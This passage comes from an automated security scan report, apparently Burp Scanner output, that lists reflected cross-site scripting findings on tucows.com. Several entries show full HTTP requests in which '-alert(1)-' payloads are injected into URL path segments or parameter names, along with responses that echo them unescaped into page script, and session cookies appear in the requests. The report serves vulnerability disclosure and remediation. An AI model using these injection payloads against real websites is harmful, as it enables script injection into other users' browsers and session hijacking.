Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3505f"-alert(1)-"50098cc31b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images3505f"-alert(1)-"50098cc31b/newassets/includes/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images3505f"-alert(1)-"50098cc31b/newassets/includes/js/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.296. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24c7b"-alert(1)-"983752aa4e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets24c7b"-alert(1)-"983752aa4e5/includes/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets24c7b"-alert(1)-"983752aa4e5/includes/js/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.297. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3dce"-alert(1)-"df3be201d5f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includesb3dce"-alert(1)-"df3be201d5f/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includesb3dce"-alert(1)-"df3be201d5f/js/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.298. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53589"-alert(1)-"260f69e5fea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js53589"-alert(1)-"260f69e5fea/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js53589"-alert(1)-"260f69e5fea/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.299. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d6bc"-alert(1)-"8adb3574f02 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/yetii.js2d6bc"-alert(1)-"8adb3574f02 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/yetii.js2d6bc"-alert(1)-"8adb3574f02";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.300. http://www.tucows.com/images/newassets/includes/js/yetii.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 772af"-alert(1)-"9c97d81b22b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/yetii.js?772af"-alert(1)-"9c97d81b22b=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/yetii.js?772af"-alert(1)-"9c97d81b22b=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.301. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e824"-alert(1)-"ef3735f6727 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images4e824"-alert(1)-"ef3735f6727/newassets/includes/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images4e824"-alert(1)-"ef3735f6727/newassets/includes/themes/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.302. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5359"-alert(1)-"a9fa148b261 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassetse5359"-alert(1)-"a9fa148b261/includes/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassetse5359"-alert(1)-"a9fa148b261/includes/themes/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.303. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 175cb"-alert(1)-"c07ddec345e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes175cb"-alert(1)-"c07ddec345e/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes175cb"-alert(1)-"c07ddec345e/themes/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.304. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bed4"-alert(1)-"bc0cdf6abcf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes5bed4"-alert(1)-"bc0cdf6abcf/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes5bed4"-alert(1)-"bc0cdf6abcf/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.305. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7990"-alert(1)-"6641f3a44d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes/03BlueMeanyf7990"-alert(1)-"6641f3a44d/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
